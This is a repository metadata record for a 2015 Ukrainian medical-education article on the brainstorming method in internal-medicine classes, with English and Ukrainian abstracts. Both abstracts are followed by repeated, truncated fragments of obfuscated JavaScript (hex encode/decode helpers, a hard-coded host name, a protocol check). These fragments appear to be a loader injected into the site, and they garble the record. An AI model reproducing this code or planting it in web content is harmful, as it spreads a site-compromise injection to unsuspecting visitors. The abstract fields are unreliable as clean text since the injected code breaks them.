APPLICATION OF “BRAINSTORMING” INTERACTIVE METHOD IN EDUCATIONAL PROCESS
ЗАСТОСУВАННЯ ІНТЕРАКТИВНОГО МЕТОДУ “МОЗКОВОГО ШТУРМУ” У НАВЧАЛЬНОМУ ПРОЦЕСІ
dc.creator | Merhel, T. V. | |
dc.date | 2015-12-15 | |
dc.date.accessioned | 2019-08-26T19:43:40Z | |
dc.date.available | 2019-08-26T19:43:40Z | |
dc.identifier | https://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/5320 | |
dc.identifier | 10.11603/me.v0i4.5320 | |
dc.identifier.uri | https://repository.tdmu.edu.ua/handle/123456789/11460 | |
dc.description | The work is devoted to the study of results of “brainstorming” interactive method introduction of studies in the process of thematic classes in internal medicine for the 5th grade students of medical department. The introduction of “brainstorming” educational technology to the process promotes in senior medical students: development of creative approach to problems solving, developing of skills of assessing of the situation, selecting and organizing of basic information, development of clinical thinking, the skills of group work, communication skills, tolerance, development of creativity, self-confidence, skills to work out multivariate approaches to solving of a clinical situation, the ability to express their own opinion, skills of working in the team, developing abilities of comprehensive situation analysis, skills of constructive criticism, forming the ability to choose the best option in a difficult clinical situation, skills to use theoretical material for analyzing ofpractical problems.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e | en-US |
dc.description | Робота присвячена вивченню та впровадженню інтерактивного методу навчання “мозковий штурм” у процес викладання тематичних занять з внутрішньої медицини для студентів V курсу медичного факультету. У студентів-медиків старших курсів впровадження в процес освітньої технології “мозкового штурму” сприяє: розвитку творчого підходу до вирішення проблеми, формуванню вмінь, оцінюванню ситуації, вибору та організації пошуку основної інформації, виробленню клінічного мислення, формуванню навичок роботи в групі, комунікабельності, толерантності, розвитку креативності, впевненості в собі, виробленню вмінь розробляти багатоваріантні підходи у вирішенні клінічної ситуації, виробленню вміння висловлювати власну думку, виробленню навичок роботи в колективі, формуванню вмінь всебічного аналізу ситуації, набуттю навичок до конструктивної критики, формуванню вміння вибрати найоптимальніший варіант у складній клінічній ситуації, набуттю навичок використання теоретичного матеріалу для аналізу практичних проблем.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e | uk-UA |
dc.format | application/pdf | |
dc.language | ukr | |
dc.publisher | Ternopil State Medical University | uk-UA |
dc.relation | https://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/5320/4889 | |
dc.rights | Авторське право (c) 2015 Медична освіта | uk-UA |
dc.source | Medical Education; No 4 (2015) | en-US |
dc.source | Медична освіта; № 4 (2015) | uk-UA |
dc.source | 2414-5998 | |
dc.source | 1681-2751 | |
dc.source | 10.11603/me.v0i4 | |
dc.title | APPLICATION OF “BRAINSTORMING” INTERACTIVE METHOD IN EDUCATIONAL PROCESS | en-US |
dc.title | ЗАСТОСУВАННЯ ІНТЕРАКТИВНОГО МЕТОДУ “МОЗКОВОГО ШТУРМУ” У НАВЧАЛЬНОМУ ПРОЦЕСІ | uk-UA |
dc.type | info:eu-repo/semantics/article | |
dc.type | info:eu-repo/semantics/publishedVersion |
Files in this item
Files | Size | Format | View |
---|---|---|---|
There are no files associated with this item. |